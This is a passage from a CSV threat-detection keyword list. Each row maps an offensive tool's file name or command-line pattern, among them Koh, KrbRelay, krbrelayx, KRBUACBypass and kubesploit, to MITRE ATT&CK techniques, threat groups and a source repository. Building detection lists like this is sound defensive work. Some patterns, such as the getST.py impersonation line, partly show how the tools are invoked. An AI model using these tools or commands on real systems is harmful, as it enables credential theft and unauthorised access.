- TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*koh filter reset*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*koh groups LUID*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*koh impersonate LUID*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*koh release all*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*koh release LUID*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*Koh.exe capture*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*Koh.exe list*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*Koh.exe monitor*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*kpiecbcckbofpmkkkdibbllpinceiihk*,greyware_tool_keyword,DotVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*krackattacks*,offensive_tool_keyword,krackattacks-scripts,This project contains scripts to test if clients or access points (APs) are affected by the KRACK attack against WPA2. For details behind this attack see our website and the research paper.,T1170 - T1555.003 - T1583.002,TA0003 - TA0007 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/vanhoefm/krackattacks-scripts,1,0,N/A,N/A,10,3233,783,2022-10-16T18:44:41Z,2017-10-18T12:58:08Z -*Kraken Mask by @DallasFR*,offensive_tool_keyword,KrakenMask,A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.,T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/RtlDallas/KrakenMask,1,0,N/A,9,2,144,28,2023-08-08T15:21:28Z,2023-08-05T19:24:36Z -*kraken.py --connect --mode * --profile * --compiler *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*KrakenMask-main*,offensive_tool_keyword,KrakenMask,A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.,T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/RtlDallas/KrakenMask,1,1,N/A,9,2,144,28,2023-08-08T15:21:28Z,2023-08-05T19:24:36Z -*krb2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*krb5/kerberosv5.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*KRB5CCNAME=*.ccache* getST.py -self -impersonate * -k -no-pass -dc-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*krb5decoder*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*krb5-enum-users *,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*krb5-enum-users.*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*krbcredccache.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*krbjack -*,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,0,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -*krbjack.tcpforward*,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,0,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -*krbjacker.py*,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,1,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -*krbjack-main*,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,1,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -*KrbRelay*misc*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*KrbRelay*smb*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*KrbRelay*spoofing*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*KrbRelay.csproj*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*KrbRelay.exe*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*KrbRelay.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*KrbRelay.sln*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*KrbRelayUp.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*krbrelayx*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/dirkjanm/krbrelayx,1,0,N/A,10,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*krbrelayx.git*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,1,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*krbrelayx.py -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*krbrelayx.py*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,1,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*krbrelayx-master*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,1,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*krbroast-pcap2hashcat.py*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,1,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*KRBUACBypass 1*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,0,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*KRBUACBypass.csproj*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,1,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*KRBUACBypass.exe*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,1,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*KRBUACBypass.sln*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,1,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*ktsuss-lpe.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*kubeletAttack.json*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*Kubesploit Agent*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,0,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*kubesploitAgent-Darwin*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in 